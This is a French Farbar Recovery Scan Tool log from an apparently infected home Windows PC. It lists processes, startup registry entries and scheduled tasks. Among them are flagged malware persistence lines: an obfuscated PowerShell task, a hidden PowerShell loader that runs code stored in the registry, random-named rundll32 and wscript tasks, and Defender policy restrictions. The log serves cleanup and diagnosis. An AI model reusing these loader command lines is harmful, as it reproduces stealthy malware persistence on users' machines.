Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 25-03-2023 Exécuté par HenriDupouy (administrateur) sur MUGIPAPA-PC (Gigabyte Technology Co., Ltd. AB350-Gaming 3) (31-03-2023 16:27:02) Exécuté depuis C:\Users\Hdupo\Desktop\jules Profils chargés: HenriDupouy Plate-forme: Microsoft Windows 10 Famille Version 21H2 19044.2130 (X64) Langue: Français (France) Navigateur par défaut: FF Mode d'amorçage: Normal ==================== Processus (Avec liste blanche) ================= (Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.) (Brother Industries, Ltd.) [Fichier non signé] C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe (Brother Industries, Ltd.) [Fichier non signé] C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe (C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe ->) (Brother Industries, Ltd.) [Fichier non signé] C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe (C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\GraphicsCardEngineStarter.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\GraphicsCardEngine.exe (C:\Program Files (x86)\GIGABYTE\GService\GCloud.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> Microsoft) C:\Program Files (x86)\GIGABYTE\CloudStation_Server\HomeCloud\HCLOUD.exe (C:\Program Files (x86)\GIGABYTE\Smart TimeLock\TimeMgmtDaemon.exe ->) (Gigabyte Technology CO., LTD.) [Fichier non signé] C:\Program Files (x86)\GIGABYTE\Smart TimeLock\AlarmClock.exe (C:\Program Files\LGHUB\lghub.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_agent.exe (C:\Program Files\Mozilla Firefox\firefox.exe ->) (Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <50> (C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe <2> (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUE.exe (Discord Inc. -> Discord Inc.) C:\Users\Hdupo\AppData\Local\Discord\app-1.0.9011\Discord.exe <6> (explorer.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub.exe <3> (GIGA-BYTE TECHNOLOGY CO., LTD. -> ) C:\Program Files (x86)\GIGABYTE\AppCenter\ApCent.exe (Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (services.exe ->) () [Fichier non signé] C:\Program Files (x86)\GIGABYTE\AppCenter\AdjustService.exe (services.exe ->) () [Fichier non signé] C:\Program Files\Serviio\bin\ServiioService.exe <2> (services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (services.exe ->) (Brother Industries, Ltd.) [Fichier non signé] C:\Program Files (x86)\Browny02\BrYNSvc.exe (services.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe (services.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CorsairMsiPluginService.exe (services.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\EasyTuneEngineService.exe (services.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> Microsoft) C:\Program Files (x86)\GIGABYTE\GService\GCloud.exe (services.exe ->) (Gigabyte Technology CO., LTD.) [Fichier non signé] C:\Program Files (x86)\GIGABYTE\Smart TimeLock\TimeMgmtDaemon.exe (services.exe ->) (Lavasoft Software Canada Inc. -> ) C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe (services.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_updater.exe (services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe <2> (services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_10.75.13001.0_x64__8wekyb3d8bbwe\gamingservices.exe (services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_10.75.13001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe (services.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2> (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\MsMpEng.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\NisSrv.exe (services.exe ->) (Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe (services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <2> (services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nvddig.inf_amd64_49c60aac2cd2e569\Display.NvContainer\NVDisplay.Container.exe <2> (services.exe ->) (Parsec Cloud, Inc. -> Parsec) C:\Program Files\Parsec\pservice.exe (services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_f82b8b1a0b601f77\RtkAudUService64.exe <2> (services.exe ->) (Safer-Networking Ltd. -> Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe (services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe (svchost.exe ->) (CyberLink Corp. -> CyberLink Corp.) C:\Program Files (x86)\CyberLink\Shared files\PDStyleAgent\PDStyleAgent.exe (svchost.exe ->) (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\GraphicsCardEngineStarter.exe (svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.YourPhone_1.23022.140.0_x64__8wekyb3d8bbwe\PhoneExperienceHost.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe ==================== Registre (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.) HKLM\...\Run: [SecurityHealth] => [X] HKLM\...\Run: [CORSAIR iCUE 4 Software] => C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUE Launcher.exe [321240 2021-07-26] (Corsair Memory, Inc. -> Corsair Memory, Inc.) HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_f82b8b1a0b601f77\RtkAudUService64.exe [1343072 2021-08-22] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [6787856 2019-03-19] (Safer-Networking Ltd. -> Safer-Networking Ltd.) HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc. -> Apple Inc.) HKLM-x32\...\Run: [QuickTime Task] => "G:\Games\QuickTime\QTTask.exe" -atboottime (Pas de fichier) HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [143360 2012-09-06] (Brother Industries, Ltd.) [Fichier non signé] HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.) [Fichier non signé] HKLM-x32\...\Run: [IndexSearch] => "C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe" (Pas de fichier) HKLM-x32\...\Run: [PaperPort PTD] => "C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe" (Pas de fichier) HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe (Pas de fichier) HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe (Pas de fichier) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [711288 2023-01-09] (Oracle America, Inc. -> Oracle Corporation) HKLM-x32\...\RunOnce: [PreRun] => C:\Program Files (x86)\Gigabyte\AppCenter\PreRun.exe [14632 2016-02-26] (GIGA-BYTE TECHNOLOGY CO., LTD. -> ) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center: Restriction <==== ATTENTION HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [LGHUB] => C:\Program Files\LGHUB\lghub.exe [136443968 2021-11-03] (Logitech Inc -> Logitech, Inc.) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [39159608 2023-03-07] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [PeerBlock] => C:\Program Files\PeerBlock\peerblock.exe [2513992 2014-01-14] (PeerBlock, LLC -> PeerBlock, LLC) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [114000232 2021-10-11] (Skype Software Sarl -> Skype Technologies S.A.) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Discord] => C:\Users\Hdupo\AppData\Local\Discord\Update.exe [1525016 2022-10-21] (Discord Inc. -> GitHub) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [MicrosoftEdgeAutoLaunch_45065A3DCB6803631E1ADEF415A71717] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [4055952 2023-03-24] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [movavi_suite_agent] => "C:\Users\Hdupo\AppData\Roaming\Movavi Video Suite 22\AgentInformer.exe" (Pas de fichier) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32754128 2023-01-08] (Epic Games Inc. -> Epic Games, Inc.) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Opera GX Browser Assistant] => C:\Users\Hdupo\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe (Pas de fichier) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe [9250224 2022-02-24] (Lavasoft Software Canada Inc. -> Lavasoft) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Bloom] => C:\Users\Hdupo\AppData\Roaming\Bloom\Bloom.exe --Ii7SIeN (Pas de fichier) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe -overwolfsilent (Pas de fichier) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [App-Torrent-Igruha] => "C:\Users\Hdupo\AppData\Local\Programs\com.wsa.a10\App-Torrent-Igruha.exe" (Pas de fichier) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Snap Camera] => "D:\Games\Snap Camera.exe" --minimized-mode (Pas de fichier) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe -scheduler (Pas de fichier) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\Run: [Parsec.App.0] => C:\Program Files\Parsec\parsecd.exe [462472 2022-12-16] (Parsec Cloud, Inc. -> Parsec) HKU\S-1-5-21-274230415-3152524040-1578995417-1001\...\MountPoints2: {3aa80cf2-3657-11ec-8e12-1c1b0de23a20} - "G:\WD SmartWare.exe" autoplay=true HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\111.0.5563.147\Installer\chrmstp.exe [2023-03-31] (Google LLC -> Google LLC) HKLM\Software\...\Authentication\Credential Providers: [{5EF9A232-5B5B-4768-95F2-3F601FB184E3}] -> C:\Windows\system32\AutoGreenCP.dll [2021-08-20] () [Fichier non signé] Startup: C:\Users\Hdupo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bfslzk.vbs [2022-02-09] () [Fichier non signé] InternetURL: C:\Users\Hdupo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yWTXuAPAoF.url -> URL: "C:\Users\Hdupo\AppData\Local\Temp\pgdhkpRFHL\DslrG.vbs" <==== ATTENTION HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION ==================== Tâches planifiées (Avec liste blanche) ============ (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {05661523-2C95-4244-99EA-172CE3548AEB} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342376 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation) Task: {06F7271A-173B-4CEB-B927-FD913CDBD4A4} - System32\Tasks\DhyhGOYkHLcwyL => rundll32 "C:\Program Files (x86)\bQZEOuyekqRU2\sLmZTDxkXMWOD.dll",#1 <==== ATTENTION Task: {1493453A-83A3-4165-B171-04E88990E4D6} - System32\Tasks\WcTeBRgOXLrCFSZ2 => rundll32 "C:\Program Files (x86)\wjTkFrExU\LZDkMO.dll",#1 <==== ATTENTION Task: {17389699-1DDC-4F56-B215-86B3CAC65745} - System32\Tasks\CLToast => C:\Program Files (x86)\CyberLink\Shared files\CLToast.exe [2317480 2021-12-27] (CyberLink Corp. -> ) Task: {1A719EDB-D215-4B20-AD27-2E00829725ED} - System32\Tasks\EasyTune 1 => C:\Program Files (x86)\GIGABYTE\EasyTune\etocfile.exe [20352 2021-10-11] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) Task: {1AB5EBDF-C796-4676-ABC1-D89CFBB2DF0B} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\BIN64\InstallManagerApp.exe [1709320 2021-02-10] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) Task: {2BA83E10-4434-4C6B-84AB-6741CBBB3C44} - System32\Tasks\Outbyte\Driver Updater\Start Driver Updater automatic scanning => C:\Program Files (x86)\Outbyte\Driver Updater\DriverUpdater.exe /UseTray /AutoScan /Schedule (Pas de fichier) Task: {2CCD1094-F015-4636-AA99-2C22F17E6F9E} - System32\Tasks\Opera scheduled Autoupdate 1654891718 => C:\Users\Hdupo\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier) Task: {3609F867-AA66-4B20-BF87-1601D0748519} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [908328 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation) Task: {367A4C6B-3557-4088-B645-8C85FFF4D842} - System32\Tasks\Microsoft\Windows\Ras\Ras => powershell -c "$fqn='xp yreaig';$eub='b$pjv=k1z7 ;cFdo rw(e$xit=o7 ;9$biw w-4l4er y$ j0;9$bi3+c+ )6{mSptha r8tc-cSsl6e eqpr -xm8 t520 09;z$vn = (1$ is*d1j4 8 8e9 7d182r59+o383b3r590k0b7 6652)n%01ueb9w;y$1hp=60 ;l$khu=9[4Nrerty.yD n so]v:b:rGleltaH o svt Asd0d7r eqsxsfewsw(w''0'' +5$9n2+w''c.yc5o7m6''n) ; i f (l'élément de données a 2077 caractères en plus). Task: {3710A78F-F25C-43A7-A8C0-BF2BE0576637} - System32\Tasks\Outbyte\Driver Updater\Time for deal => C:\Program Files (x86)\Outbyte\Driver Updater\DriverUpdater.exe /UseTray /Schedule /TimeForDeal (Pas de fichier) Task: {38E59DE3-AEDD-4C23-849A-121B978C3B14} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [649256 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation) Task: {39492F0D-14A9-411E-99A9-A7C901CEF0F0} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [7337200 2020-03-04] (Safer-Networking Ltd. -> Safer-Networking Ltd.) Task: {4051AC41-3859-48A0-9B4B-9ACC67522FFF} - System32\Tasks\GraphicsCardEngine => C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\GraphicsCardEngineStarter.exe [234880 2021-04-13] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) Task: {40B4F531-7ED7-40F2-9CD2-F5C65109AAA4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1560056 2023-02-01] (Adobe Inc. -> Adobe Inc.) Task: {43842F3A-95E8-4775-8F95-9650953E0BD3} - System32\Tasks\Outbyte\Driver Updater\Start Driver Updater оn logon => C:\Program Files (x86)\Outbyte\Driver Updater\DriverUpdater.exe /UseTray /CheckAutoscan /Schedule (Pas de fichier) Task: {4CFDD16F-0B80-40B4-99C7-34F6DAF578F7} - System32\Tasks\AMDAutoUpdate => C:\Program Files\AMD\AutoUpdate\AMDAutoUpdate.exe [672064 2022-09-26] (Advanced Micro Devices Inc. -> ) Task: {509CA88C-9036-40F5-AEF0-C57633BB3461} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655336 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation) Task: {5A18789A-33C7-4D0C-8CB1-EA442CD13323} - System32\Tasks\CCleanerSkipUAC - Hdupo => C:\Program Files\CCleaner\CCleaner.exe [33038648 2023-03-07] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd) Task: {5C6E706B-9A1A-4DAB-AD8B-C974C376CE1A} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655336 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation) Task: {69D1E24D-3D0C-4523-964C-CF9853F719D4} - System32\Tasks\SIV-VGA => C:\Program Files (x86)\GIGABYTE\SIV\Sensord.exe [257408 2021-06-29] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) Task: {6DD53124-712D-4E61-9B05-3559D6DAD0F2} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\MpCmdRun.exe [1645904 2023-03-29] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {71F3A4EF-B06C-4FAC-BA41-3436B97B008A} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [718752 2023-03-22] (Mozilla Corporation -> Mozilla Foundation) Task: {72EED537-1AF2-4848-A38A-784BF77CB1A9} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\MpCmdRun.exe [1645904 2023-03-29] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {7AED892A-3E13-49DC-9CE7-407BAF81B8E6} - System32\Tasks\PowerDirectorStyleAgent => C:\Program Files (x86)\CyberLink\Shared files\PDStyleAgent\PDStyleAgent.exe [97960 2021-12-27] (CyberLink Corp. -> CyberLink Corp.) Task: {7B326768-F946-4000-A1A8-E9FCF3A74C4F} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe [2577752 2022-08-01] (Overwolf Ltd -> Overwolf LTD) Task: {7BE59F2E-AF84-42E2-B529-FEF2837164B4} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1643985166 => C:\Users\Hdupo\AppData\Local\Programs\Opera GX\launcher.exe -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Hdupo\AppData\Local\Programs\Opera GX\assistant" $(Arg0) Task: {868E1633-9C8B-48F0-AEF9-E2AFE2308232} - System32\Tasks\CCleanerSkipUAC - HenriDupouy => C:\Program Files\CCleaner\CCleaner.exe [33038648 2023-03-07] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd) Task: {87CA4D89-4387-4C27-B1B1-4D77BC5426EE} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655336 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation) Task: {8C00AD36-72A7-4BF3-B042-FF8FE8055412} - System32\Tasks\EasyTune => C:\Program Files (x86)\GIGABYTE\EasyTune\etinit.exe [17280 2021-04-08] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) Task: {8C743957-F823-4213-8002-8245439E760F} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [714256 2023-03-07] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd) Task: {9582B244-41B9-4BA8-80F4-A37F0498DA37} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [1907712 2021-10-20] () [Fichier non signé] Task: {97ACAD82-5E5C-4D24-A14B-D580D6E82A87} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-09-03] (Google LLC -> Google LLC) Task: {A3ACEB94-5BA7-418D-9C02-EF7D6A73FB9E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\MpCmdRun.exe [1645904 2023-03-29] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {A5915428-9C74-4F74-B2AB-FE9A6C89FC45} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [5723640 2019-09-04] (Safer-Networking Ltd. -> Safer-Networking Ltd.) Task: {A881B5E2-5664-4B90-A2FF-AFAA2DE595FE} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-03-18] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log Task: {B1E223FE-213D-4AE7-8630-E39FBA33AA5A} - System32\Tasks\memte => powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\memte\).memte).EntryPoint.Invoke($Null,$Null) <==== ATTENTION Task: {B2BCDEA9-5875-4467-9FD5-537B3058C254} - System32\Tasks\Timer => c:\windows\system\svchost.exe (Pas de fichier) <==== ATTENTION Task: {BA48A7E7-09A7-4309-BED2-50AF79577A80} - System32\Tasks\SIV => C:\Program Files (x86)\GIGABYTE\SIV\Thermald.exe [392296 2023-01-09] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) Task: {C26B9E67-A69B-40B3-8FE4-8087006E7DF0} - System32\Tasks\CCleanerCrashReporting => C:\Program Files\CCleaner\CCleanerBugReport.exe [4703544 2023-03-07] (PIRIFORM SOFTWARE LIMITED -> Piriform Software) -> --product 90 --send dumps|report --path "C:\Program Files\CCleaner\LOG" --programpath "C:\Program Files\CCleaner" --configpath "C:\Program Files\CCleaner\Setup" --guid "4ed078b9-994e-4e18-b6db-62c13a8ce9ed" --version "6.10.10347" --silent Task: {C2784F19-ECEC-42BB-9067-361AFAE3BBF6} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [6166736 2020-03-04] (Safer-Networking Ltd. -> Safer-Networking Ltd.) Task: {CD686892-5239-48B9-8A0D-ADF5C1290524} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe -task (Pas de fichier) Task: {CD9B7AD8-956C-4EE8-9C0F-B1C9114F514D} - System32\Tasks\Diagnostic\Service => C:\Users\Hdupo\AppData\Roaming\cbanql\setevn.exe -> "C:\Users\Hdupo\AppData\Roaming\cbanql\setevn.dat" Task: {CDE6BF8D-B58D-4B83-9F7D-CFE35DE4335C} - System32\Tasks\CLToastRun => C:\Program Files (x86)\CyberLink\Shared files\CLToast.exe [2317480 2021-12-27] (CyberLink Corp. -> ) Task: {D797481B-E2BD-4927-AE12-AA112CC54243} - System32\Tasks\Opera GX scheduled Autoupdate 1642679077 => C:\Users\Hdupo\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier) Task: {DB5BA65C-E32A-4443-9085-980F7E8DB848} - System32\Tasks\Mozilla\Firefox Background Update 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe [676768 2023-03-22] (Mozilla Corporation -> Mozilla Corporation) -> --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate Task: {DFF10AF9-9B8E-4DCF-85CD-530F533C527B} - System32\Tasks\xuGNGpMfuIDWg2 => C:\Windows\system32\wscript.exe "C:\ProgramData\ZvEHJNdJDJxIeVVB\KUDyZbS.wsf" <==== ATTENTION Task: {E0A377B5-20C8-4A64-8E44-68630028D450} - System32\Tasks\Microsoft\Windows\Application Experience\CNBP_SDEngine.ni => C:\Windows\microsoft.net\framework\v4.0.30319\RegSvcs.exe /nologo C:\PROGRA~3\ACCESS~1\STARTH~1\MTXFAW~1.DLL Task: {E81783FC-EAAD-4CF0-8F37-CB1D2C85DA7C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-09-03] (Google LLC -> Google LLC) Task: {EB353E66-7F81-4B44-931F-E03436A188F6} - System32\Tasks\fvgavqrnEnHHROaNgGs2 => rundll32 "C:\Program Files (x86)\GuXKuCyCeSmjC\GReXNap.dll",#1 <==== ATTENTION Task: {ED22AC97-BABB-4C10-8167-380D8FC25FFC} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655336 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation) Task: {EF8504A7-8E68-4529-80BB-5F70E67ABFEB} - System32\Tasks\FPfgiItdWHGuoXXpQ2 => rundll32 "C:\Program Files (x86)\uAhcATovcXckvYCnvyR\HicabjG.dll",#1 <==== ATTENTION Task: {FF63E958-15C4-47FC-9AFF-4EA9BE3662B0} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [908328 2022-12-07] (Nvidia Corporation -> NVIDIA Corporation) (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) Task: C:\Windows\Tasks\CCleanerCrashReporting.job => C:\Program Files\CCleaner\CCleanerBugReport.exe Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => ==================== Internet (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.) Hosts: 